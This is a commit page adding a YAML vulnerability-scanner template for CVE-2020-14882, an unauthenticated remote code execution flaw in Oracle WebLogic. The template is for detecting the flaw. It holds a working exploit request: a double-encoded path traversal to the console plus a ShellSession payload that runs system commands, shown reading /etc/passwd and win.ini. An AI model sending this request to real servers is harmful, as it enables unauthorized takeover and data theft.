Merge pull request #596 from dwisiswant0/add/CVE-2020-14882

Add CVE-2020-14882
patch-1
bauthard 2020-10-29 19:16:49 +05:30 committed by GitHub
commit 048cc7183c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 41 additions and 0 deletions

41
cves/CVE-2020-14882.yaml Normal file
View File

@ -0,0 +1,41 @@
id: cve-2020-14882
info:
name: Oracle WebLogic Server Unauthenticated RCE
author: dwisiswant0
severity: critical
description: |
Vulnerability in the Oracle WebLogic Server
product of Oracle Fusion Middleware (component: Console).
Supported versions that are affected are 10.3.6.0.0,
12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.
Easily exploitable vulnerability allows unauthenticated
attacker with network access via HTTP to compromise the server.
Successful attacks of this vulnerability can result in takeover.
# References:
# - https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
# - https://twitter.com/jas502n/status/1321416053050667009
# - https://youtu.be/JFVDOIL0YtA
requests:
- payloads:
command:
- "cat%20%2Fetc%2Fpasswd"
- "type%20C%3A%5CWindows%5Cwin.ini"
raw:
- |
POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
Host: {{Hostname}}
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=utf-8
_nfpb=true&_pageLabel=&handle=http://com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27{{'command'}}%27);%22)
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
- "\\[(font|extension|file)s\\]"
- "=UnexpectedExceptionPage"
condition: or
part: body